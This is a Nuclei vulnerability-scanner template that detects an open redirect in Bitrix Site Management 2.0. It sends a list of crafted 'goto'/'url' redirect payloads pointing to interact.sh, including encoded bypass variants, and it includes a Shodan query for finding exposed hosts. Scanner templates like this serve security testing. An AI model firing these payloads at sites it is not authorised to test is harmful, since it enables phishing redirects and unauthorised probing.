nuclei-templates/http/vulnerabilities/other/bitrix-open-redirect.yaml

id: bitrix-open-redirect

info:
  name: Bitrix Site Management Russia 2.0 - Open Redirect
  author: pikpikcu,gtrrnr
  severity: medium
  description: Bitrix Site Management Russia 2.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    max-request: 14
    shodan-query: "html:\"/bitrix/\""
  tags: redirect,bitrix,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - '/bitrix/rk.php?goto=https://interact.sh'
        - '/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh'
        - '/bitrix/redirect.php?event3=352513&goto=https://interact.sh'
        - '/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh'
        - '/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh'
        - '/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh'
        - '/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh'
        - '/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh'
        - '/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh'
        - '/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh'
        - '/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
        - '/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
        - '/bitrix/redirect.php?goto=https://example.com%252F:123@interactsh.com/'
        - '/bitrix/tools/track_mail_click.php?url=http://site%252F@interactsh.com/'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
        part: header

      - type: status
        condition: or
        status:
          - 302
          - 301
# digest: 4a0a00473045022076898c7e94f9fa54a0043643d8984c844200ec0d3a8a829faa58e30e382dc635022100d0b04f2037e4ef5eb563a23e63788d8c85ca17f7cbe4760666895f1383585f12:922c64590222798bb761d5b6d8e72950